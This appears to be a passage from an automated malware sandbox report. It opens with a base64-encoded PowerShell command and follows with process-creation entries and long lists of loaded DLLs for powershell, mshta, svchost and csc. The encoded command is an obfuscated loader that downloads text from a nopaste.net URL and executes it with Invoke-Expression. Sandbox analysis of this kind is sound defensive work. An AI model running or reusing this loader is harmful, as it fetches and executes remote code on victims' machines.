bABzACAAcABhAG4AeQBvACoAOwBTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEUAbQBpACAAJwBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAGcATQBXAEkAcABFAEgATgBWAGkAewBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABEAHYAZwB5AGkASgB4AHUAVAB0ACgAcwB0AHIAaQBuAGcAIAB1AHIAbAApAHsAcgBlAHQAdQByAG4AIAAoAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACgAKQApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAdQByAGwAKQA7AH0AfQAnADsAUwBlAHQALQBWAGEAcgBpAGEAYgBsAGUAIABCAEYAIAAnAGgAdAB0AHAAcwA6AC8ALwBuAG8AcABhAHMAdABlAC4AbgBlAHQALwBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAJwA7ACYAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQAuAFAAcwBPAGIAagBlAGMAdAAuAE0AZQB0AGgAbwBkAHMAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBjAGwAaQBrAGUAJwBHACoAZAAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAKABHAFYAIABFACoAdABlAHgAKgApAC4AVgBhAGwAdQBlAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQB8AEcATQApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACgARwBWACAARQAqAHQAZQB4ACoAKQAuAFYAYQBsAHUAZQAuACgAKAAoAEcAVgAgAEUAKgB0AGUAeAAqACkALgBWAGEAbAB1AGUAfABHAE0AKQBbADYAXQAuAE4AYQBtAGUAKQB8AEcATQB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAJABfAC4ATgBhAG0AZQAtAGMAbABpAGsAZQAnACoAbwBtACoAZQAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAJwAqAC0AVAB5ACoAZQAnACwAMQAsADEAKQAsAFsATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBDAG8AbQBtAGEAbgBkAFQAeQBwAGUAcwBdADoAOgBDAG0AZABsAGUAdAApAC0ATABhACAAQwBTAGgAYQByAHAAIAAoAEwAUwAgAFYAYQByAGkAYQBiAGwAZQA6AC8ARQBtAGkAKQAuAFYAYQBsAHUAZQA7ACgAWwBnAE0AVwBJAHAARQBIAE4AVgBpAF0AOgA6AEQAdgBnAHkAaQBKAHgAdQBUAHQAKAAoAEcAVgAgAEIARgAgAC0AVgBhAGwAdQBlAE8AbgBsACkAKQApAHwAJgAoAEcASQAgAEEAbABpAGEAcwA6AEkARQAqACkA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exe "C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qwzwa2hv.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exe "C:\Users\user\AppData\Local\Temp\cb93f779-25b4-41a2-a992-79114e2e0d22\xdd.exe"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF57.tmp" "c:\Users\user\AppData\Local\Temp\CSC2CD5A3AC9BED45FD9C1F4AD4196788AE.TMP"
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: slc.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
